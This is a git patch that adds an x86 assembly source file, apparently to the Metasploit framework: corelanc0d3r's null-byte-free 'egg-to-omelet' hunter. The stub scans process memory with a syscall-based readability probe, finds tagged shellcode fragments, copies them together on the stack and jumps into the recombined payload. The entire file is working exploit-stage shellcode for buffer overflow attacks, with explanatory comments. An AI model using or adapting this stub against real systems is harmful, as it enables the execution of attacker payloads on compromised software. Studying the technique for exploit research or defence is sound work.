From 15c7a25d682a7c514f67b29f6d1172dd43895376 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Mon, 23 Aug 2010 17:43:53 +0000 Subject: [PATCH] add omlet stub asm source git-svn-id: file:///home/svn/framework3/trunk@10110 4d416f70-5f16-0410-b530-b9f4589650da --- external/source/corelanc0d3r_omelet.asm | 100 ++++++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 external/source/corelanc0d3r_omelet.asm diff --git a/external/source/corelanc0d3r_omelet.asm b/external/source/corelanc0d3r_omelet.asm new file mode 100644 index 0000000000..5eb8779f87 --- /dev/null +++ b/external/source/corelanc0d3r_omelet.asm @@ -0,0 +1,100 @@ +;-------------------------------------------------- +;corelanc0d3r - egg-to-omelet hunter - null byte free +;v1.0 +;http://www.corelan.be:8800 +;peter.ve@corelan.be +;-------------------------------------------------- +BITS 32 + +nr_eggs equ 0x2 ;number of eggs +egg_size equ 0x7b ;123 bytes of payload per egg + +jmp short start + +;routine to calculate the target location +;for writing recombined shellcode (omelet) +;I'll use EDI as target location +;First, I'll make EDI point to end of stack +;and I'll put the number of shellcode eggs in eax +get_target_loc: + ;get stack pointer and put it in EDI +push esp +pop edi + ;set EDI to end of stack +or di,0xffff ;edi=0x....ffff = end of current stack frame +mov edx,edi ;use edx as start location for the search +xor eax,eax ;zero eax +mov al,nr_eggs ;put number of eggs in eax +calc_target_loc: +xor esi,esi ;use esi as counter to step back +mov si,0-egg_size+20 ;add 20 bytes of extra space, per egg + +get_target_loc_loop: ;start loop +dec edi ;step back +inc esi ;and update ESI counter +cmp si,-1 ;continue to step back until ESI = -1 +jnz get_target_loc_loop +dec eax ;loop again if we did not take all pieces + ;into account yet +jnz calc_target_loc +;edi now contains target location for recombined shellcode +xor ebx,ebx ;put loop counter in ebx +mov bl,nr_eggs+1 +ret + +start: +call get_target_loc ;jump to routine which will calculate shellcode + ;target address + +;start looking, using edx as basepointer +jmp short search_next_address +find_egg: +dec edx ;scasd does edx+4, so dec edx 4 times + inc edx one time + ; to make sure we don't miss any pointers +dec edx +dec edx +dec edx +search_next_address: +inc edx ;next one +push edx ;save edx +push byte +0x02 +pop eax ;set eax to 0x02 +int 0x2e +cmp al,0x5 ;address readable ? +pop edx ;restore edx +je search_next_address ;if address is not readable, go to next address +mov eax,0x77303001 ;if address is readable, prepare tag in eax +add eax,ebx ;add offset (ebx contains egg counter, remember ?) +xchg edi,edx ;switch edx/edi +scasd ;edi points to the tag ? +xchg edi,edx ;switch edx/edi back +jnz find_egg ;if tag was not found, go to next address +;found the tag at edx + +copy_egg: +;ecx must first be set to egg_size (used by rep instruction) +;and esi as source +mov esi,edx ;set ESI = EDX (needed for rep instruction) +xor ecx,ecx +mov cl,egg_size ;set copy counter +rep movsb ;copy egg from ESI to EDI +dec ebx ;decrement egg +cmp bl,1 ;found all eggs ? +jnz find_egg ;no = look for next egg +; done - all eggs have been found and copied + +done: +call get_target_loc ; re-calculate location where recombined shellcode is placed +jmp edi ; and jump to it :) + + + + + + + + + + + +